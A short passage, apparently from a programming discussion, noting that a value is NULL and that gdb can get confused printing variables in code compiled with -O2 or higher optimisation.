is NULL. gdb shouldn't have a problem printing that, but it does sometimes get confused when the code is compiled with -O2 or higher.
